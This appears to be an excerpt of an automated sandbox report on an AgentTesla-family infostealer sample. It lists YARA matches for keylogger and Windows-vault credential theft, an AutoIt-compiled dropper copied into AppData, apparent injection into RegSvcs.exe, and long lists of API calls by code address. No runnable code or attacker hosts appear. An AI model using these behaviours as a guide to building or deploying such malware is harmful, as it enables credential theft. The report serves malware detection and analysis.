                    Source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: This is a third-party compiled AutoIt script.0_2_00DD3B4C
                    Source: toIuQILmr1.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: toIuQILmr1.exe, 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7805aec2-7
                    Source: toIuQILmr1.exe, 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_08328b0b-4
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: This is a third-party compiled AutoIt script.2_2_00C53B4C
                    Source: outvaunts.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: outvaunts.exe, 00000002.00000002.2067226635.0000000000D05000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_76b6640e-9
                    Source: outvaunts.exe, 00000002.00000002.2067226635.0000000000D05000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_890e5113-f
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: This is a third-party compiled AutoIt script.5_2_00C53B4C
                    Source: outvaunts.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: outvaunts.exe, 00000005.00000002.2185271062.0000000000D05000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_15f333e8-e
                    Source: outvaunts.exe, 00000005.00000002.2185271062.0000000000D05000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_918e871a-7
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00DD3633
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00E5C27C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C220 NtdllDialogWndProc_W,0_2_00E5C220
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00E5C49C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00E5C788
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00E5C8EE
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C86D SendMessageW,NtdllDialogWndProc_W,0_2_00E5C86D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CBF9 NtdllDialogWndProc_W,0_2_00E5CBF9
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CBAE NtdllDialogWndProc_W,0_2_00E5CBAE
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CB7F NtdllDialogWndProc_W,0_2_00E5CB7F
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CB50 NtdllDialogWndProc_W,0_2_00E5CB50
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00E5CC2E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E5CDAC
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00E5CD6C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00DD1290
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,0_2_00DD1287
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD16DE GetParent,NtdllDialogWndProc_W,0_2_00DD16DE
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5D6C6 NtdllDialogWndProc_W,0_2_00E5D6C6
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD16B5 NtdllDialogWndProc_W,0_2_00DD16B5
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD167D NtdllDialogWndProc_W,0_2_00DD167D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00E5D74C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD189B NtdllDialogWndProc_W,0_2_00DD189B
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5DA9A NtdllDialogWndProc_W,0_2_00E5DA9A
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00E5BF4D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C53633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00C53633
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00CDC27C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC220 NtdllDialogWndProc_W,2_2_00CDC220
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00CDC49C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00CDC788
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00CDC8EE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC86D SendMessageW,NtdllDialogWndProc_W,2_2_00CDC86D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCBF9 NtdllDialogWndProc_W,2_2_00CDCBF9
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCBAE NtdllDialogWndProc_W,2_2_00CDCBAE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCB50 NtdllDialogWndProc_W,2_2_00CDCB50
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCB7F NtdllDialogWndProc_W,2_2_00CDCB7F
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCC2E ClientToScreen,NtdllDialogWndProc_W,2_2_00CDCC2E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00CDCDAC
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCD6C GetWindowLongW,NtdllDialogWndProc_W,2_2_00CDCD6C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C51287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,2_2_00C51287
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C51290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_00C51290
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDD6C6 NtdllDialogWndProc_W,2_2_00CDD6C6
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C516DE GetParent,NtdllDialogWndProc_W,2_2_00C516DE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C516B5 NtdllDialogWndProc_W,2_2_00C516B5
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C5167D NtdllDialogWndProc_W,2_2_00C5167D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,2_2_00CDD74C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C5189B NtdllDialogWndProc_W,2_2_00C5189B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDDA9A NtdllDialogWndProc_W,2_2_00CDDA9A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDBF4D NtdllDialogWndProc_W,CallWindowProcW,2_2_00CDBF4D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C53633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,5_2_00C53633
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,5_2_00CDC27C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC220 NtdllDialogWndProc_W,5_2_00CDC220
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,5_2_00CDC49C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,5_2_00CDC788
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,5_2_00CDC8EE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC86D SendMessageW,NtdllDialogWndProc_W,5_2_00CDC86D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCBF9 NtdllDialogWndProc_W,5_2_00CDCBF9
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCBAE NtdllDialogWndProc_W,5_2_00CDCBAE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCB50 NtdllDialogWndProc_W,5_2_00CDCB50
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCB7F NtdllDialogWndProc_W,5_2_00CDCB7F
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCC2E ClientToScreen,NtdllDialogWndProc_W,5_2_00CDCC2E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00CDCDAC
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCD6C GetWindowLongW,NtdllDialogWndProc_W,5_2_00CDCD6C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C51287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,5_2_00C51287
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C51290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,5_2_00C51290
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDD6C6 NtdllDialogWndProc_W,5_2_00CDD6C6
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C516DE GetParent,NtdllDialogWndProc_W,5_2_00C516DE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C516B5 NtdllDialogWndProc_W,5_2_00C516B5
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C5167D NtdllDialogWndProc_W,5_2_00C5167D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,5_2_00CDD74C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C5189B NtdllDialogWndProc_W,5_2_00C5189B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDDA9A NtdllDialogWndProc_W,5_2_00CDDA9A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDBF4D NtdllDialogWndProc_W,CallWindowProcW,5_2_00CDBF4D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E340B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00E340B1
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E28858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74AE5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00E28858
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E3545F
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00CB545F
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00CB545F
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DDE8000_2_00DDE800
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DFDBB50_2_00DFDBB5
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DDFE400_2_00DDFE40
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5804A0_2_00E5804A
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DDE0600_2_00DDE060
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DE41400_2_00DE4140
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF24050_2_00DF2405
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E065220_2_00E06522
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E506650_2_00E50665
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E0267E0_2_00E0267E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DE68430_2_00DE6843
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF283A0_2_00DF283A
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E089DF0_2_00E089DF
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E50AE20_2_00E50AE2
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E06A940_2_00E06A94
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DE8A0E0_2_00DE8A0E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E2EB070_2_00E2EB07
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E38B130_2_00E38B13
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DFCD610_2_00DFCD61
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E070060_2_00E07006
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DE31900_2_00DE3190
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DE710E0_2_00DE710E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD12870_2_00DD1287
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF33C70_2_00DF33C7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DFF4190_2_00DFF419
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF16C40_2_00DF16C4
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DE56800_2_00DE5680
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF78D30_2_00DF78D3
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DE58C00_2_00DE58C0
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF1BB80_2_00DF1BB8
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E09D050_2_00E09D05
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF1FD00_2_00DF1FD0
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DFBFE60_2_00DFBFE6
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_011563180_2_01156318
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C7DBB52_2_00C7DBB5
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C5FE402_2_00C5FE40
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CD804A2_2_00CD804A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C5E0602_2_00C5E060
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C641402_2_00C64140
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C724052_2_00C72405
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C865222_2_00C86522
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CD06652_2_00CD0665
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C8267E2_2_00C8267E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C668432_2_00C66843
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C5E8002_2_00C5E800
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C7283A2_2_00C7283A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C889DF2_2_00C889DF
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CD0AE22_2_00CD0AE2
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C86A942_2_00C86A94
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C68A0E2_2_00C68A0E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CAEB072_2_00CAEB07
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB8B132_2_00CB8B13
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C7CD612_2_00C7CD61
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C870062_2_00C87006
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C631902_2_00C63190
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C6710E2_2_00C6710E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C512872_2_00C51287
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C733C72_2_00C733C7
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C7F4192_2_00C7F419
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C716C42_2_00C716C4
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C656802_2_00C65680
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C658C02_2_00C658C0
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C778D32_2_00C778D3
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C71BB82_2_00C71BB8
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C89D052_2_00C89D05
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C71FD02_2_00C71FD0
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C7BFE62_2_00C7BFE6
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_011122D82_2_011122D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A9B48A3_2_00A9B48A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A94A883_2_00A94A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A93E703_2_00A93E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A941B83_2_00A941B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060E7E503_2_060E7E50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060E66C03_2_060E66C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060E24403_2_060E2440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060E52703_2_060E5270
